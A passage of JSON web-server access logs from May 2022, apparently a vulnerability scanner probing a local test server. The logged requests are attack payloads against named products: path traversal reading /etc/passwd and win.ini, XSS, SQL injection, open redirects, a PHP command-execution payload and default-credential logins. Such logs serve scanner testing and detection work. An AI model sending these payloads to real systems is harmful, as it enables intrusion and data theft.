HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.186","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /./../../../../../../../../../../windows/win.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/nagios4/status.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.190","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.188","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/nagios3/status.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wt3/forceSave.php?file=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.194","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1 HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.000","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=nuclei HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"getpwd=WorldFilledWithLove","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PRESENTATION/EPSONCONNECT HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"j_username=admin&j_password=admin&from=%2F&Submit=Sign+in","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /j_spring_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/tenants HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.194","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:/%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.194","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.200","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////example.com@/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?pretty HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?pretty HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////http://127.0.0.1example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_cat/indices?v HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_cat/indices?v HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/data?chart=system.cpu&format=json&points=125&group=average>ime=0&options=ms%7Cflip%7Cjsonwrap%7Cnonzero&after=-120&dimensions=iowait HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///;@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_all/_search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.197","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5C/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Fexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.208","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22logfile\x22; filename=\x22\x22\x0D\x0AContent-Type: text/plain\x0D\x0A\x0D\x0APOC_TEST\x0D\x0A\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.202","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/errors.log HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.000","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"\x0D\x0A\x0D\x0A find_profile\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A name\x0D\x0A \x0D\x0A *\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.204","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /getcfg.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cucm-uds/users HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.204","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/sdcall/Login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/297MbFR9xCp1AnbLDfcq6nykrlY/)%3B%3C%2Fscript%3E%3C HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"\x0D\x0A\x0D\x0A generate_script\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A {{profile}}\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A /etc/passwd\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libraries/joomla/database/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/vars HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"sid=254&pe=1,2,3,4,5&appname=%0a&au=1&username=nsroot","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /menu/stapp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?pp=env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.201","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:35 